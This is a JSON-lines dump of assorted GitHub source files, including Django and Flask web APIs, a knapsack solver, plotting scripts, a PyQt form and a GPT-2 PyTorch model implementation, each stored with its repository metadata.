})\n\n@csrf_exempt\n@api_view(['POST'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef submitTimeSheet(request):\n    if request.method=='POST':\n        usr=request.user\n        data=request.data\n        \n        \n        id=request.data['shift']\n        shift_id=json.loads(id)\n\n        print(data)\n        try:\n            obj=TimeSheet.objects.get(shift_id=shift_id)\n        except:\n            return Response({\n                'status':0,\n                'message':'Shift id does not exist',\n                'data':[]\n            })\n        if obj.submit_status:\n            return Response({\n                'status':0,\n                'message':'Time sheet already submitted',\n                'data':[]\n            })\n\n        sez=TimeSheetSubmitSerialize(instance=obj,data=data,context={'request':request})\n        if sez.is_valid():\n            sez.save(submit_status=True)\n            obj.shift.time_sheet=True\n            obj.save()\n            return Response({\n                'status':1,\n                'message':'Successfully updated data',\n                'data':sez.data\n                \n            })\n        else:\n            for i in sez.errors:\n                a=0\n                l=sez.errors[i]\n                s=f'{i}-{l[0]}'\n                a+=1\n                if a==1:\n                    response = {\n                        'status': 0,\n                        'message':s,\n\n                        'data': []\n                    }\n\n            return Response(response)\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef timeSheetStatus(request):\n    if request.method=='GET':\n        usr=request.user\n        print(usr.id)\n        obj=TimeSheet.objects.filter(user=usr,submit_status=True)\n        sez=TimeSheetStatus(obj,many=True)\n        return Response({\n            'status':1,\n            'message':'Successfully fetched',\n            'data':sez.data\n            \n        })\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef postListForTimeSheet(request):\n    usr=request.user\n\n    obj=Shift_Post.objects.filter(applicant=usr,completed=False,time_sheet=False)\n    sez=ApplcantShiftSerialize(obj,many=True,context={'current_user':usr})\n    return Response({\n        'status':1,\n        'message':'Successfully 
fetched data',\n        'data':sez.data\n        \n    })\n\n\n\n\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef likeShift(request):\n    if request.method=='GET':\n        usr=request.user\n        try:\n            id=request.GET.get('shift_id')\n        except:\n            return Response({\n                'status':0,\n                'message':'Please send a correct key and value',\n                'data':[]\n                \n            })\n        shift_id=json.loads(id)\n        try:\n            obj=ShiftLike.objects.get(shift=shift_id)\n        except:\n            obj=ShiftLike.objects.create(user=usr,shift_id=shift_id)\n        if obj.like:\n            obj.delete()\n        else:\n            obj.like=True\n            obj.save()\n        obj1=obj.shift\n        sez=ApplcantShiftSerialize(obj1,context={'current_user':usr})\n        return Response({\n            'status':1,\n            'message':'Successfully added post to your favorite list',\n            'data':sez.data\n            \n        })\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef favoriteList(request):\n    if request.method=='GET':\n        usr=request.user\n        paginat=PageNumberPagination()\n        paginat.page_size=10\n        paginat.page_size_query_param='page_size'\n        try:\n            obj=ShiftLike.objects.filter(user=usr)\n        except:\n            obj=None\n        if obj:\n            l=list()\n            for i in obj:\n                l.append(i.shift)\n            \n            result_obj=paginat.paginate_queryset(l,request)\n            sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr})\n            # sez=ApplcantShiftSerialize(l,many=True,context={'current_user':usr})\n            t=sez.data\n            response=paginat.get_paginated_response(t)\n            response.data['message']='data fetched successfully'\n            response.data['status']=1\n            return Response(response.data)\n        else:\n            return Response({\n                'status':1,\n                'message':'No favorites available',\n                'data':[]\n                \n            })\n\n","repo_name":"devtech2019/python","sub_path":"staff_hiring/staff_app/view2.py","file_name":"view2.py","file_ext":"py","file_size_in_byte":18957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7606730199","text":"from common import *\n\n\n\n\n#########################################\n# Colouring for the terminal / console\n#########################################\nimport colorama\ncolorama.init() # Makes stdout/err color codes work on windows too.\nfrom colorama import Fore as cFG # Foreground color codes\nfrom colorama import Back as cBG # Background color codes\n\nimport contextlib\n@contextlib.contextmanager\ndef coloring(*color_codes):\n    \"\"\"\n    Color printing using 'with'. Example:\n    >>> with coloring(cFG.GREEN): print(\"This is in color\")\n    \"\"\"\n    if len(color_codes)==0:\n        color_codes = [colorama.Style.BRIGHT, cFG.BLUE]\n\n    print(*color_codes, end=\"\")\n    yield \n    print(colorama.Style.RESET_ALL, end=\"\", flush=True)\n\n\ndef print_c(*args,color='blue',**kwargs):\n    \"\"\"Print with color.\n    But I prefer using the coloring context manager defined above.\"\"\"\n    s = ' '.join([str(k) for k in args])\n    print(termcolors[color] + s + termcolors['ENDC'],**kwargs)\n\n# Terminal color codes. 
Better to use colorama (above) instead.\ntermcolors={\n    'blue' : '\\033[94m',\n    'green' : '\\033[92m',\n    'OKblue' : '\\033[94m',\n    'OKgreen' : '\\033[92m',\n    'WARNING' : '\\033[93m',\n    'FAIL' : '\\033[91m',\n    'ENDC' : '\\033[0m' ,\n    'header' : '\\033[95m',\n    'bold' : '\\033[1m' ,\n    'underline' : '\\033[4m' ,\n}\n\n\n#########################################\n# Colouring for matplotlib\n#########################################\nsns_bg = array([0.9176, 0.9176, 0.9490])\n\n# Standard color codes\nRGBs = {c: array(mpl.colors.colorConverter.to_rgb(c)) for c in 'bgrmyckw'}\n#RGBs = [mpl.colors.colorConverter.to_rgb(c) for c in 'bgrmyckw']\n\n# Matlab (new) colors.\nml_colors = np.array(np.matrix(\"\"\"\n     0    0.4470    0.7410;\n0.8500    0.3250    0.0980;\n0.9290    0.6940    0.1250;\n0.4940    0.1840    0.5560;\n0.4660    0.6740    0.1880;\n0.3010    0.7450    0.9330;\n0.6350    0.0780    0.1840 \n\"\"\"))\n# Load into matplotlib color dictionary\nfor code, color in zip('boyvgcr', ml_colors):\n    mpl.colors.ColorConverter.colors['ml'+code] = color\n    mpl.colors.colorConverter.cache ['ml'+code] = color\n\n# Seaborn colors\nsns_colors = np.array(np.matrix(\"\"\"\n0.298 , 0.447 , 0.690 ; \n0.333 , 0.658 , 0.407 ; \n0.768 , 0.305 , 0.321 ; \n0.505 , 0.447 , 0.698 ; \n0.8 , 0.725 , 0.454 ; \n0.392 , 0.709 , 0.803 ; \n0.1 , 0.1 , 0.1 ; \n1.0 , 1.0 , 1.0 \n\"\"\"))\n# Overwrite default color codes\nfor code, color in zip('bgrmyckw', sns_colors):\n    mpl.colors.colorConverter.colors[code] = color\n    mpl.colors.colorConverter.cache [code] = color\n\n\ndef blend_rgb(rgb, a, bg_rgb=ones(3)):\n    \"\"\"\n    Fake RGB transparency by blending it to some background.\n    Useful for creating gradients.\n\n    Also useful for creating 'transparency' for exporting to eps.\n    But there's no actual transparency, so superposition of lines\n    will not work. For that: export to pdf, or make do without.\n\n    - rgb: N-by-3 rgb, or a color code.\n    - a: alpha value\n    - bg_rgb: background in rgb. 
Default: white\n    Based on stackoverflow.com/a/33375738/38281\n    \"\"\" \n    if isinstance(rgb,str):\n        rgb = mpl.colors.colorConverter.to_rgb(rgb)\n    return [a*c1 + (1-a)*c2 for (c1, c2) in zip(rgb, bg_rgb)]\n\n\n","repo_name":"franktoffel/dapper","sub_path":"tools/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"6523956689","text":"from flask import render_template\nimport pandas as pd\nimport time\nimport redis\nimport prometheus_client\nfrom prometheus_client import Counter\nfrom flask import Response, Flask, jsonify\nfrom bson import json_util\nfrom flask_pymongo import PyMongo\nimport pymongo\nfrom pymongo import MongoClient\nfrom flask import stream_with_context, request\nfrom flask_cors import CORS\nimport json\nfrom app_init import create_app\nimport os\n\nconfig_name = os.getenv('FLASK_CONFIG')\napp, cache, client = create_app(config_name)\n\n\n# app = Flask(__name__)\n# CORS(app)\n# cache = redis.Redis(host='redis', port=6379)\n# # use command 'docker inspect {mongo-container-name}' to find Gateway\n# # Making a Connection with MongoClient\n# #client = MongoClient(\"mongodb://localhost:27017/\")\n#client = MongoClient(\"mongodb://172.19.0.1:27018/\")\n# database\ndb = client[\"medical_data\"]\n# collection\ncompany = db[\"hospital_data\"]\ndf = pd.read_csv(\n    './modules_under_development/1.write_data_to _mongodb/hospbsc.csv')\ncompany.insert_many(df.to_dict('record'))\n\n# mongo = PyMongo(app, uri=\"mongodb://172.19.0.1:27017/drug_data\")\ntotal_requests = Counter('request_count', 'Total webapp request count')\n\n# TODO:\n# add patients CRUD\n\n\ndef get_hit_count():\n    retries = 5\n    while True:\n        try:\n            return cache.incr('hits')\n        except redis.exceptions.ConnectionError as exc:\n            if retries == 0:\n                raise exc\n            retries -= 1\n            time.sleep(0.5)\n\n\n@app.route('/hits')\ndef get_index():\n    count = get_hit_count()\n    return '這是你第 {} 參訪\\n'.format(count)\n\n\n@app.route('/metrics')\ndef requests_count():\n    total_requests.inc()\n    return Response(prometheus_client.generate_latest(total_requests), mimetype='text/plain')\n\n\n@app.route('/')\ndef index():\n    total_requests.inc()\n    return jsonify({\n        'status': 'ok'\n    })\n\n# todo:\n# replace NaN in database\n# because NaN is not a valid value in json.\n\n\n@app.route('/hospital_info/<hospital_number>', methods=['GET', 'POST'])\ndef hospital_info(hospital_number):\n    record = company.find_one({\"醫事機構代碼\": hospital_number})\n\n    if '_id' in record:\n        del record['_id']\n    # records=json.dumps(record, ensure_ascii=True)\n    # # encode json to utf-8\n    # encoded_data = records.encode('utf-8')\n    encoded_data = jsonify(record)\n    return encoded_data\n\n\n@app.route('/member', methods=['GET'])\ndef member():\n    print()\n    return jsonify({'hello': 'world'})\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=5000)\n","repo_name":"J0hnLee/pharmX_old","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32067663978","text":"\n# MAX KNAPSACK\n\n# uses sol_max_ks, m_max_ks\nfrom c02_1_max_ks_exh import sol_max_ks, m_max_ks\n\n# simplified backtracking criterion:\n# is the partial solution still feasible?\ndef K_max_ks(s,v,S,t):\n    size = 0\n    for i in range(len(t)): # add up the sizes of the chosen items  \n        if t[i] == 1:\n            size += s[i]\n    \n    if size <= S: # check whether the maximum size is exceeded\n        return 
True\n\n    return False\n\n# Backtracking design pattern\ndef max_ks_backtracking(s,v,S):\n    opt = -1 # optimal value\n    m = len(s) # number of items\n    M = {()} # set of active nodes\n    # () = root\n    while M:\n        t_prev = M.pop() # take an arbitrary node\n        for a in range(2): # take the next item or leave it\n            t = t_prev + (a,) # new tuple\n            if len(t) == m:\n                if sol_max_ks(s,v,S,t): # check whether t is a feasible solution\n                    value = m_max_ks(s,v,S,t)\n                    if value > opt: # check whether t is a new best solution\n                        opt = value\n\n            else:\n                if K_max_ks(s,v,S,t):\n                    M.add(t)\n                else:\n                    pass\n    return opt\n\n\n# Example: m=4, S=7\nif __name__ == \"__main__\":\n    print(max_ks_backtracking([3,2,1,5,1,3,2,4],[3,1,1,4,4,5,3,7],10))\n    print(max_ks_backtracking([3,8,1,5],[3,1,1,4],8))\n","repo_name":"MMueller98/Algorithmen-Design-Python","sub_path":"Code/c02_2_max_ks_bt.py","file_name":"c02_2_max_ks_bt.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39063361462","text":"#!/usr/bin/env python3\n\nfrom collections import namedtuple, deque, defaultdict, OrderedDict, Counter\n\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\nprint(p.y)\n\nprint(isinstance(p, Point))\nprint(isinstance(p, tuple))\n\nCircle = namedtuple('Circle', ['x', 'y', 'r'])\n\nq = deque(['a', 'b', 'c'])\nq.append('x')\nq.appendleft('y')\nprint(q)\n\ndd = defaultdict(lambda: 'N/A')\ndd['key1'] = 'abc'\nprint(dd['key1'])\nprint(dd['key2'])\n\nd = dict([('a', 1), ('b', 2), ('c', 3)])\nprint(d)\nod = OrderedDict([('a', 1), ('b', 2), ('c', 3)])\nprint(od)\n\nod2 = OrderedDict()\nod2['z'] = 1\nod2['y'] = 2\nod2['x'] = 3\nprint(list(od2.keys()))\n\nc = Counter()\nfor ch in 'programming':\n    c[ch] = c[ch] + 1\nprint(c)\n\n\n\n","repo_name":"Rynxiao/python3-learn","sub_path":"inner-module/collections_m.py","file_name":"collections_m.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818450792","text":"import os\nfrom typing import List, Generator\n\nfrom src.models.dataframe_model import DataFrameModel\nimport pandas as pd\n\nfrom src.types import MerData\n\n\ndef mock_tact_scenario(mer_data: MerData, refs: List[str]) -> MerData:\n    \"\"\"\n    Mock all tactical scenarios to zero (equator)\n    \"\"\"\n    if 'TACTICAL_SCENARIO' not in mer_data:\n        mer_data['TACTICAL_SCENARIO'] = DataFrameModel(pd.DataFrame(columns=['REFERENCE']), 'TACTICAL_SCENARIO')\n\n    for ref in refs:\n        if ref not in list(mer_data['TACTICAL_SCENARIO'].original_df['REFERENCE']):\n            mer_data['TACTICAL_SCENARIO'].original_df = \\\n                mer_data['TACTICAL_SCENARIO'].original_df.append(\n                    pd.DataFrame({\n                        'GRID CENTER LAT': [0],\n                        'GRID CENTER LONG': [0],\n                        'REFERENCE': [ref]\n                    }), ignore_index=True)\n    return mer_data\n\n\ndef get_valid_files_from_folder(path: str) -> Generator:\n    \"\"\"\n    return all zip and text files from the given directory\n    \"\"\"\n    for root, dirs, files in os.walk(path):\n        for file in files:\n            if file.endswith(('.txt', '.zip')):\n                yield os.path.join(root, file)\n","repo_name":"jooppoelman/mer.io","sub_path":"src/handlers/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74396929831","text":"from flask import Flask, flash, render_template, request, url_for, redirect, jsonify\nfrom flask_sqlalchemy 
import SQLAlchemy\n\napp = Flask(__name__)\napp.secret_key = \"Secret Key\"\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:rootku@localhost/crud'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\n\nclass Data(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(100))\n    email = db.Column(db.String(100))\n    phone = db.Column(db.String(100))\n\n    def __init__(self, name, email, phone):\n        self.name = name\n        self.email = email\n        self.phone = phone\n\n\n# create the tables in the database\nwith app.app_context():\n    db.create_all()\n\n\n@app.route('/')\ndef Index():\n    allData = Data.query.all()\n\n    return render_template(\"index.html\", employees=allData)\n\n# Route to read data with the GET method\n@app.route('/get_data', methods=['GET'])\ndef get_data():\n    # Fetch all data from the database\n    allData = Data.query.all()\n    \n    # Arrange the data into a suitable format (e.g. JSON)\n    data_list = []\n    for data in allData:\n        data_dict = {\n            'id': data.id,\n            'name': data.name,\n            'email': data.email,\n            'phone': data.phone\n        }\n        data_list.append(data_dict)\n\n    return jsonify(data_list)\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n\n    if request.method == 'POST':\n\n        flash(\"Data Penderita Berhasil Ditambahkan!\")\n\n        name = request.form['name']\n        email = request.form['email']\n        phone = request.form['phone']\n\n        myData = Data(name, email, phone)\n        db.session.add(myData)\n        db.session.commit()\n\n        return redirect(url_for('Index'))\n\n\n@app.route('/update', methods=['GET', 'POST'])\ndef update():\n\n    if request.method == 'POST':\n        myData = Data.query.get(request.form.get('id'))\n\n        myData.name = request.form['name']\n        myData.email = request.form['email']\n        myData.phone = request.form['phone']\n\n        db.session.commit()\n        flash(\"Data Penderita Berhasil Diubah.\")\n\n        return redirect(url_for('Index'))\n\n\n@app.route('/delete/<id>/', methods=['GET', 'POST'])\ndef delete(id):\n    myData = Data.query.get(id)\n    db.session.delete(myData)\n    db.session.commit()\n\n    flash(\"Data Penderita Berhasil Dihapus.\")\n\n    return redirect(url_for('Index'))\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"Avrians/CRUD-Flask_WebApps","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70550048232","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nif len(sys.argv) != 2 :\n    print('Incorrect number of arguments. 
Instead use:')\n print('\\tpython code.py [RunGlobalShift.txt]')\n exit(-1)\n\n\nrunNo = []\npeak = []\nstd = []\nwith open(sys.argv[1],'r') as f:\n for line in f:\n parse = line.strip().split(\" \")\n runNo.append( int(parse[0]) )\n peak.append( float(parse[3]) )\n std.append( float(parse[4]) )\n\nplt.errorbar(runNo,peak,yerr=std,linestyle='none',marker='o',color='blue')\nplt.ylim([-6,3])\nplt.xlabel('Run Number [a.u.]',fontsize=16)\nplt.ylabel('Photon Peak Position [ns]',fontsize=16)\nplt.yticks(fontsize=14)\nplt.xticks(fontsize=14)\nplt.savefig('runshifts.pdf',bbox_inches='tight')\nplt.show()\n","repo_name":"hauenst/bandsoft_calib","sub_path":"photon_align/plot_singleBarShift.py","file_name":"plot_singleBarShift.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36679052962","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"\nEfficiency test of Bansal's algorithm for Roth's problem\nUsage:\n$ python bdg_on_roth_problem2.py [end_n] [sample]\n=> investigate ROTH[2] to ROTH[end_n-1] with sample = [sample]\n\"\"\"\n\nimport sys\nimport time as tm\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport pickle\nfrom Hypergraph import Hypergraph\nfrom bansal_dadusch_garg import *\n\ndef solve_roth(n):\n graph = Hypergraph.roth(n)\n print('n =', n, ':')\n print(graph.incidence)\n start = tm.time()\n coloring, num_steps = solve(graph, print_per_time = 100)\n elapsed_time = tm.time() - start\n return coloring, num_steps, elapsed_time\n\ndef solve_roth_bf(n):\n # brute force\n graph = Hypergraph.roth(n)\n print('n =', n, ':')\n print(graph.incidence)\n start = tm.time()\n coloring = graph.find_optimal_coloring()\n elapsed_time = tm.time() - start\n return coloring, elapsed_time\n\ndef measure_time(n, sample = 10):\n result = np.asarray([solve_roth(n) for i in range(sample)])\n num_steps_median = np.median(result[:, 1])\n elapsed_time_median = np.median(result[:, 2])\n return num_steps_median, elapsed_time_median\n\ndef measure_time_bf(n, sample = 10):\n result = np.asarray([solve_roth_bf(n) for i in range(sample)])\n elapsed_time_median = np.median(result[:, 1])\n return elapsed_time_median\n\n\nsample = int(sys.argv[2])\nnrange = np.arange(2, int(sys.argv[1]))\nresult = np.asarray([measure_time(n, sample = sample) for n in nrange])\nelapsed_time_bf = np.asarray([measure_time_bf(n, sample = sample) for n in nrange])\nnum_steps = result[:, 0]\nelapsed_time = result[:, 1]\nprint(elapsed_time)\nprint(elapsed_time_bf)\nprint(num_steps)\n\nwith open(\"elapsed_time.pickle\", \"wb\") as f:\n pickle.dump(elapsed_time, f)\nwith open(\"elapsed_time_bf.pickle\", \"wb\") as f:\n pickle.dump(elapsed_time_bf, f)\nwith open(\"num_steps_lst.pickle\", \"wb\") as f:\n pickle.dump(num_steps, f)\n\nplt.gca().get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\n\nplt.plot(nrange, elapsed_time, label=\"Bansal\")\nplt.plot(nrange, elapsed_time_bf, label=\"brute force\")\nplt.title('Elapsed time')\nplt.xlabel('n')\nplt.ylabel('sec.')\nplt.legend()\nplt.savefig('elapsed_time.png')\nplt.show()\n\nplt.gca().get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\nplt.plot(nrange, num_steps)\nplt.title('Number of 
solve(SDP)')\nplt.xlabel('n')\nplt.ylabel('number')\nplt.savefig('num_steps.png')\nplt.show()\n","repo_name":"privet-kitty/hypergraph-discrepancy","sub_path":"bdg_on_roth_problem2.py","file_name":"bdg_on_roth_problem2.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3436129990","text":"from functools import cache\nclass Solution:\n def bestTeamScore(self, scores: List[int], ages: List[int]) -> int:\n max_scores= [0]*(max(ages))\n\n scores_ages = sorted(list(zip(scores,ages)))\n for score,age in scores_ages:\n max_scores[age-1] = score + max(max_scores[:age])\n \n return max(max_scores)\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_1626/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37255272489","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 5 18:19:45 2020\n\n@author: José Correia\n\"\"\"\n\nfrom PyQt5 import QtWidgets, uic\nimport sys\n\n\nclass Arduino(QtWidgets.QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self, parent=None)\n uic.loadUi('arduino.ui', self) # Load the .ui file\n \n \n #self.setGeometry(200, 200, 200, 100)\n #self.PortaCom.textEdited.connect(self.LePorta)\n #self.Pressao.valueChanged.connect(self.LePressao)\n #self.Volume.valueChanged.connect(self.LeVolume)\n \n \n self.show() # Show the GUI\n \n def LePressao(self):\n #print(self.Pressao.value())\n return\n \n\n \n def LeVolume(self, nome:str)->None:\n\n self.Volume.setValue(len(nome))\n \n self.QPushButton('Exit', self)\n quit = QtWidgets.QPushButton('Exit', self)\n self.connect(quit, uic.SIGNAL('clicked()'),\n QtWidgets.qApp, uic.SLOT('quit()'))\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Arduino()\napp.exec_()\n","repo_name":"armatita/pressure_volume_controller","sub_path":"old/Arduino.py","file_name":"Arduino.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17410905771","text":"import math\n\nimport torch.nn as nn\n\nfrom modelzoo.common.pytorch.layers import (\n EmbeddingLayer,\n TransformerDecoder,\n TransformerDecoderLayer,\n)\nfrom modelzoo.transformers.pytorch.gpt2.sparse_mask import (\n create_fixed_sparse_attention_mask,\n)\nfrom modelzoo.transformers.pytorch.transformer_utils import (\n build_broadcastable_attention_mask,\n make_sparse_mask_broadcastable,\n)\n\n\nclass GPT2LMHeadModel(nn.Module):\n \"\"\"\n GPT-2 model with LM head\n \"\"\"\n\n def __init__(\n self,\n # Embedding\n vocab_size=50257,\n max_position_embeddings=1024,\n embd_pdrop=0.1,\n position_embedding_type=\"learned\",\n hidden_size=768,\n share_embedding_weights=True,\n embedding_layer_norm=False,\n # Encoder\n num_hidden_layers=12,\n dropout_rate=0.1,\n layer_norm_epsilon=1.0e-5,\n # Encoder - Attention\n num_heads=12,\n attention_type=\"scaled_dot_product\",\n use_projection_bias_in_attention=True,\n use_ffn_bias_in_attention=True,\n attention_dropout_rate=0.1,\n attention_softmax_fp32=True,\n attention_kernel=None,\n # Encoder - ffn\n filter_size=3072,\n nonlinearity=\"gelu\",\n use_ffn_bias=True,\n # Task-specific\n use_bias_in_output=False,\n initializer_range=0.02,\n embedding_initializer=None,\n initializer=None,\n output_layer_initializer=None,\n # Loss\n loss_weight=1.0,\n fixed_sparse_attention=None,\n loss_scaling=\"num_tokens\",\n ):\n 
super(GPT2LMHeadModel, self).__init__()\n\n # std deviation for weight initialization\n self.initializer_range = initializer_range\n self.num_hidden_layers = num_hidden_layers\n self.share_embedding_weights = share_embedding_weights\n self.embedding_layer_norm = embedding_layer_norm\n self.max_position_embeddings = max_position_embeddings\n self.position_embedding_type = position_embedding_type\n\n assert (\n self.position_embedding_type != \"rotary\"\n ), f\"GPT2 models don't support rotary position embedding.\"\n\n if initializer is None:\n attention_initializer = {\n \"name\": \"normal\",\n \"mean\": 0.0,\n \"std\": self.initializer_range\n / math.sqrt(2 * self.num_hidden_layers),\n }\n ffn_initializer = {\n \"name\": \"normal\",\n \"mean\": 0.0,\n \"std\": self.initializer_range,\n }\n else:\n attention_initializer = initializer\n ffn_initializer = initializer\n\n if embedding_initializer is None:\n embedding_initializer = {\n \"name\": \"normal\",\n \"mean\": 0.0,\n \"std\": self.initializer_range,\n }\n\n self.embedding_layer = EmbeddingLayer(\n vocab_size=vocab_size,\n embedding_size=hidden_size,\n embeddings_initializer=embedding_initializer,\n position_embedding_type=position_embedding_type,\n position_embeddings_initializer=embedding_initializer,\n max_position_embeddings=max_position_embeddings,\n )\n\n if self.embedding_layer_norm:\n self.embedding_ln_f = nn.LayerNorm(\n hidden_size, eps=layer_norm_epsilon\n )\n\n self.drop_embd = nn.Dropout(embd_pdrop)\n\n decoder_layer = TransformerDecoderLayer(\n d_model=hidden_size,\n nhead=num_heads,\n dim_feedforward=filter_size,\n dropout=dropout_rate,\n activation=nonlinearity,\n layer_norm_eps=layer_norm_epsilon,\n norm_first=True,\n extra_attention_params={\"attention_kernel\": attention_kernel},\n add_cross_attention=False,\n attention_type=attention_type,\n attention_dropout_rate=attention_dropout_rate,\n attention_softmax_fp32=attention_softmax_fp32,\n use_projection_bias_in_attention=use_projection_bias_in_attention,\n use_ffn_bias_in_attention=use_ffn_bias_in_attention,\n use_ffn_bias=use_ffn_bias,\n attention_initializer=attention_initializer,\n attention_output_layer_initializer=output_layer_initializer,\n ffn_initializer=ffn_initializer,\n ffn_output_layer_initializer=output_layer_initializer,\n use_ff_layer1_dropout=False,\n )\n\n # Final LayerNorm\n self.ln_f = nn.LayerNorm(hidden_size, eps=layer_norm_epsilon)\n\n self.transformer_decoder = TransformerDecoder(\n decoder_layer, num_layers=num_hidden_layers, norm=self.ln_f,\n )\n\n if fixed_sparse_attention is not None:\n self.fixed_sparsity_mask = create_fixed_sparse_attention_mask(\n max_sequence_length=max_position_embeddings,\n n_heads=num_heads,\n **fixed_sparse_attention,\n )\n else:\n self.fixed_sparsity_mask = None\n\n self.lm_head = nn.Linear(\n hidden_size, vocab_size, bias=use_bias_in_output\n )\n\n self.tie_weights()\n\n self.__reset_parameters()\n\n def reset_parameters(self):\n self.embedding_layer.reset_parameters()\n self.transformer_decoder.reset_parameters()\n self.__reset_parameters()\n\n def __reset_parameters(self):\n # Init final norm layer\n self.ln_f.bias.data.zero_()\n self.ln_f.weight.data.fill_(1.0)\n\n # Initialize LM head\n self.lm_head.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if self.lm_head.bias is not None:\n self.lm_head.bias.data.zero_()\n\n def tie_weights(self):\n if not self.share_embedding_weights:\n return\n\n output_embedding = self.get_output_embeddings()\n input_embedding = self.get_input_embeddings()\n 
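# weight tying: point the LM head at the token-embedding matrix so both layers share one parameter tensor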
output_embedding.weight = input_embedding.weight\n\n if getattr(output_embedding, \"bias\", None) is not None:\n output_embedding.bias.data = nn.functional.pad(\n output_embedding.bias.data,\n (\n 0,\n output_embedding.weight.shape[0]\n - output_embedding.bias.shape[0],\n ),\n \"constant\",\n 0,\n )\n if hasattr(output_embedding, \"out_features\") and hasattr(\n input_embedding, \"num_embeddings\"\n ):\n output_embedding.out_features = input_embedding.num_embeddings\n\n def get_output_embeddings(self):\n return self.lm_head\n\n def get_input_embeddings(self):\n return self.embedding_layer.get_input_embeddings()\n\n def forward(\n self, input_ids=None, attention_mask=None, labels=None,\n ):\n hidden_states = self.embedding_layer(input_ids)\n if self.embedding_layer_norm:\n hidden_states = self.embedding_ln_f(hidden_states)\n hidden_states = self.drop_embd(hidden_states)\n\n causal_attention_mask = build_broadcastable_attention_mask(\n attention_mask,\n build_causal=True,\n device=input_ids.device,\n dtype=hidden_states.dtype,\n )\n\n # Fixed sparse attention, used in GPT-3 model\n sparse_attention_mask = None\n if self.fixed_sparsity_mask is not None:\n sparse_attention_mask = make_sparse_mask_broadcastable(\n self.fixed_sparsity_mask,\n attention_mask,\n dtype=hidden_states.dtype,\n device=hidden_states.device,\n revert_mask=False,\n )\n\n hidden_states = self.transformer_decoder(\n hidden_states,\n tgt_mask=causal_attention_mask,\n sparse_mask=sparse_attention_mask,\n )\n\n lm_logits = self.lm_head(hidden_states)\n\n return lm_logits\n","repo_name":"standardgalactic/modelzoo","sub_path":"modelzoo/transformers/pytorch/gpt2/gpt2_model.py","file_name":"gpt2_model.py","file_ext":"py","file_size_in_byte":7958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"39792991582","text":"import random\n\n## Initializes the game elements\n# Retrieves the word dictionary\nf = open('words.txt', 'r')\ntext = f.read()\n\n# Splits dictionary & initializes arrays\nlines = text.split(\"\\n\")\nwords = []\nfour_letter_words = []\n\n# Collects all words\nfor each in lines:\n words += each.split(\" \")\n\n# Retrieves only valid 4 letter words\nfor each in words:\n if len(each) == 4:\n if('-' in each or '.' 
